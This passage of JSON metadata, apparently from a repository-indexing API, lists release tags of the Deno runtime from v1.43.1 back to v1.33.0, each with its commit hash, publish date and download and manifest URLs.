"dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"p